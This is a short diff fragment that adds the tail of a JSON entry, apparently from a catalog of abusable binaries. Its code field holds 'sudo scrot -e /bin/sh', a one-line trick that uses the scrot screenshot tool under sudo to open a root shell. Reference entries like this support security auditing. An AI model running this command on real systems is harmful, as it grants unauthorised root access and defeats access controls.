+        "code": "sudo scrot -e /bin/sh\n"
+      }
+    ]
+  }
+}